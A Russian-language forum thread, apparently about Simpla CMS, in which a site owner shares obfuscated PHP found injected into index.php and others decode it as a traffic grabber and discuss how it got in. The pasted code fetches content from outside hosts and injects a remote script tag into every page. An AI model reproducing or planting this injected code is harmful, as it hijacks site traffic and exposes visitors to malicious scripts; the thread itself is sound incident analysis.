Вредоносный код

[SV911]

Начались жалобы от клиентов о том, что анивирусы ругаются на мой сайт.
Проверив все хорошенько обнаружил вот такой лишний кусок кода в index.php в корне сайта:

function sql2_safe($in) {
       $rtn = base64_decode($in);
       return $rtn;
}
function collectnewss() {

	if (!isset($_COOKIE["iJijkdaMnerys"])) {
       $value = 'yadeor';
	$ip = $_SERVER['REMOTE_ADDR'];
       $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
	$file = @fopen ($get, "r");
	$content = @fread($file, 1000);
	@setcookie("iJijkdaMnerys", $value, time()+3600*24);
	if (!$content)
		echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
	else 
		echo $content;

	}
}
collectnewss ();

Когда открываешь любую страничку - внизу появлялась вот такая строчка:

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Кто сталкивался? Какие мысли есть откуда появилось?
Возможен ли вариант, что этот кусок кода добавил кто то у кого был доступ к фтп (пару разработчиков с этого форума имеют доступ) или это добавлено через какую то уязвимость симплы?

[delprofile]

Вы могли его сами занести со своего же компа. Обычно так и происходит.
Ваш комп заражён открыв сессию вирус пробирается на фтп и прописывается в нужных файлах.

http://easylife-ru.getdefault.com/%D0%BD%D0%B0-%D1%81%D0%B0%D0%B9%D1%82%D0%B5-%D0%BE%D0%B1%D0%BD%D0%B0%D1%80%D1%83%D0%B6%D0%B5%D0%BD-%D0%BF%D0%BE%D1%82%D0%B5%D0%BD%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE-%D0%BE%D0%BF%D0%B0%D1%81/

http://opencartforum.ru/topic/17410-%D1%80%D0%B5%D1%88%D0%B5%D0%BD%D0%BE-%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%BD%D0%BD%D0%B8%D0%B9-%D0%BA%D0%BE%D0%B4-%D0%B2-%D1%84%D0%B0%D0%B9%D0%BB%D0%B0%D1%85-%D0%BE%D1%88%D0%B8%D0%B1%D0%BA%D0%B0-%D0%B2-%D1%84%D0%B0%D0%B9%D0%BB%D0%B5-wwwindexphp/

Раскодировка

aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=

http://xxxporno.xxuz.com:888/move.php?ip=

PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Простым языком это грабер траффика с попандер окном

[SV911]

Принцип попадания понял. Действительно это может происходить из за вируса на компе. При этом у меня с компа есть доступ к 8 сайтам. На 7 сайтах все ок. У них нет такой проблемы. И только к одному зараженному есть доступ не только у меня. Значит все таки вирус у кого то с программистов. (((

[SimplaDev]

Частенько владельцы нуленных сайтов жалуются на такие проблемы, т.к. скачивают неизвестно где, думая, что качают на халяву

[SimplaDev]

Хотя вот сегодня обратились ко мне со сходной проблемой, там htaccess вирус поправил слегка и пару файлов записал. Что интересно другие сайты у человека оказались не заражены, так что дыра может быть и в Симпле.

[SV911]

У меня лицензия а не нуленая и скачанная неизвестно где

[svma3x]

Хотя вот сегодня обратились ко мне со сходной проблемой, там htaccess вирус поправил слегка и пару файлов записал. Что интересно другие сайты у человека оказались не заражены, так что дыра может быть и в Симпле.

 

Добрый день - подскажите нашли дырку или нет - сегодня у меня произошла та же беда только htaccess затерли полностью и сделали папку с ярлыком на корневую директорию - пришлось залочить фтп от изменений - но это не дело - я думаю что дыра где в js скриптах но вот конкретно еще не ковырял - может вы уже нашли место стандартных атак?) Удар нанесли по двум сайтам - хотя сайтов на симпле много на хостинге поэтому вариант вируса исключаю - да и у меня mac так что подхватить что-то врятли тоже.